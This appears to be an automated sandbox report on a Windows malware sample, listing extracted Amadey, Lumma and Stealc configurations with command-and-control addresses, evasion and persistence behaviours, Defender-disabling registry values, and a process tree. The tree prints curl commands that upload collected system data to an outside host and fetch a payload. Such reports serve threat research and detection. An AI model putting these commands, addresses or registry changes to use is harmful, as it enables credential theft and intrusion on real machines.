Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 11:50
Static task
static1
General
-
Target
697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe
-
Size
3.1MB
-
MD5
326a64b31756243c9d480b7d9ee2b710
-
SHA1
c82a3fa741caf754a04adf6a900741bdbd17af75
-
SHA256
697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280
-
SHA512
42ab7d47003c972c419770e58a50566c8f92c22ccac150d222434fad537d6285f465a60fe15049cda266af22eb4999af88a758ca020e0e4f052f5fc5345d96b3
-
SSDEEP
49152:vvKkav8COhbF3UAFYcfMHO884bFGj18M77D7nj37A02unD:vveabF3UAYcEHtBF0d7zjR2mD
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://drive-connect.cyou/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" aceb2f67bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" aceb2f67bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" aceb2f67bf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection aceb2f67bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" aceb2f67bf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" aceb2f67bf.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c700dec7dc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aecc472bb8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aceb2f67bf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2300 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aecc472bb8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aceb2f67bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c700dec7dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c700dec7dc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aecc472bb8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aceb2f67bf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 6ce0a63070.exe -
Drops startup file 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe -
Executes dropped EXE 16 IoCs
pid Process 2868 skotes.exe 4632 53b3a06cb2.exe 2504 53b3a06cb2.exe 3276 M5iFR20.exe 5052 W4KLQf7.exe 4256 c700dec7dc.exe 3196 023aa85f50.exe 5016 023aa85f50.exe 4576 023aa85f50.exe 1436 6ce0a63070.exe 3060 ebde0dba70.exe 3176 aecc472bb8.exe 6076 aceb2f67bf.exe 6088 f82296a49e.exe 5936 skotes.exe 5464 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine c700dec7dc.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine aecc472bb8.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine aceb2f67bf.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" aceb2f67bf.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features aceb2f67bf.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ebde0dba70.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014380001\\ebde0dba70.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aecc472bb8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014381001\\aecc472bb8.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aceb2f67bf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014382001\\aceb2f67bf.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a000000023b6f-57.dat autoit_exe behavioral2/files/0x000a000000023b96-172.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3624 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 2868 skotes.exe 4256 c700dec7dc.exe 3176 aecc472bb8.exe 6076 aceb2f67bf.exe 5936 skotes.exe 5464 skotes.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4632 set thread context of 2504 4632 53b3a06cb2.exe 87 PID 3196 set thread context of 4576 3196 023aa85f50.exe 129 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4908 1436 WerFault.exe 131 1644 4256 WerFault.exe 121 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language ebde0dba70.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aceb2f67bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c700dec7dc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f82296a49e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aecc472bb8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 023aa85f50.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53b3a06cb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W4KLQf7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53b3a06cb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 023aa85f50.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6ce0a63070.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebde0dba70.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage ebde0dba70.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M5iFR20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 6ce0a63070.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 6ce0a63070.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4880 timeout.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 5016 systeminfo.exe 3388 systeminfo.exe -
Kills process with taskkill 5 IoCs
pid Process 4540 taskkill.exe 440 taskkill.exe 4748 taskkill.exe 3836 taskkill.exe 4684 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 2868 skotes.exe 2868 skotes.exe 4256 c700dec7dc.exe 4256 c700dec7dc.exe 1436 6ce0a63070.exe 1436 6ce0a63070.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3176 aecc472bb8.exe 3176 aecc472bb8.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 6076 aceb2f67bf.exe 6076 aceb2f67bf.exe 6076 aceb2f67bf.exe 6076 aceb2f67bf.exe 6076 aceb2f67bf.exe 5936 skotes.exe 5936 skotes.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 5052 W4KLQf7.exe 5052 W4KLQf7.exe 5464 skotes.exe 5464 skotes.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 3624 tasklist.exe Token: SeDebugPrivilege 3836 taskkill.exe Token: SeDebugPrivilege 4684 taskkill.exe Token: SeDebugPrivilege 4540 taskkill.exe Token: SeDebugPrivilege 440 taskkill.exe Token: SeDebugPrivilege 4748 taskkill.exe Token: SeDebugPrivilege 4972 firefox.exe Token: SeDebugPrivilege 4972 firefox.exe Token: SeDebugPrivilege 6076 aceb2f67bf.exe Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 3276 M5iFR20.exe 3276 M5iFR20.exe 3276 M5iFR20.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 3276 M5iFR20.exe 3276 M5iFR20.exe 3276 M5iFR20.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 4972 firefox.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe 3060 ebde0dba70.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4972 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2440 wrote to memory of 2868 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 83 PID 2440 wrote to memory of 2868 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 83 PID 2440 wrote to memory of 2868 2440 697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe 83 PID 2868 wrote to memory of 4632 2868 skotes.exe 85 PID 2868 wrote to memory of 4632 2868 skotes.exe 85 PID 2868 wrote to memory of 4632 2868 skotes.exe 85 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 4632 wrote to memory of 2504 4632 53b3a06cb2.exe 87 PID 2868 wrote to memory of 3276 2868 skotes.exe 89 PID 2868 wrote to memory of 3276 2868 skotes.exe 89 PID 2868 wrote to memory of 3276 2868 skotes.exe 89 PID 3276 wrote to memory of 4120 3276 M5iFR20.exe 90 PID 3276 wrote to memory of 4120 3276 M5iFR20.exe 90 PID 3276 wrote to memory of 4120 3276 M5iFR20.exe 90 PID 4120 wrote to memory of 5016 4120 cmd.exe 92 PID 4120 wrote to memory of 5016 4120 cmd.exe 92 PID 4120 wrote to memory of 5016 4120 cmd.exe 92 PID 4120 wrote to memory of 3624 4120 cmd.exe 100 PID 4120 wrote to memory of 3624 4120 cmd.exe 100 PID 4120 wrote to memory of 3624 4120 cmd.exe 100 PID 3276 wrote to memory of 3512 3276 M5iFR20.exe 101 PID 3276 wrote to memory of 3512 3276 M5iFR20.exe 101 PID 3276 wrote to memory of 3512 3276 M5iFR20.exe 101 PID 3276 wrote to memory of 4132 3276 M5iFR20.exe 104 PID 3276 wrote to memory of 4132 3276 M5iFR20.exe 104 PID 3276 wrote to memory of 4132 3276 M5iFR20.exe 104 PID 3276 wrote to memory of 2900 3276 M5iFR20.exe 108 PID 3276 wrote to memory of 2900 3276 M5iFR20.exe 108 PID 3276 wrote to memory of 2900 3276 M5iFR20.exe 108 PID 3276 wrote to memory of 3888 3276 M5iFR20.exe 109 PID 3276 wrote to memory of 3888 3276 M5iFR20.exe 109 PID 3276 wrote to memory of 3888 3276 M5iFR20.exe 109 PID 3276 wrote to memory of 464 3276 M5iFR20.exe 113 PID 3276 wrote to memory of 464 3276 M5iFR20.exe 113 PID 3276 wrote to memory of 464 3276 M5iFR20.exe 113 PID 3276 wrote to memory of 1068 3276 M5iFR20.exe 115 PID 3276 wrote to memory of 1068 3276 M5iFR20.exe 115 PID 3276 wrote to memory of 1068 3276 M5iFR20.exe 115 PID 2868 wrote to memory of 5052 2868 skotes.exe 118 PID 2868 wrote to memory of 5052 2868 skotes.exe 118 PID 2868 wrote to memory of 5052 2868 skotes.exe 118 PID 2868 wrote to memory of 4256 2868 skotes.exe 121 PID 2868 wrote to memory of 4256 2868 skotes.exe 121 PID 2868 wrote to memory of 4256 2868 skotes.exe 121 PID 2868 wrote to memory of 3196 2868 skotes.exe 126 PID 2868 wrote to memory of 3196 2868 skotes.exe 126 PID 2868 wrote to memory of 3196 2868 skotes.exe 126 PID 3196 wrote to memory of 5016 3196 023aa85f50.exe 128 PID 3196 wrote to memory of 5016 3196 023aa85f50.exe 128 PID 3196 wrote to memory of 5016 3196 023aa85f50.exe 128 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 PID 3196 wrote to memory of 4576 3196 023aa85f50.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe"C:\Users\Admin\AppData\Local\Temp\697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\53b3a06cb2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2504
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:5016
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3512
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:4132
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
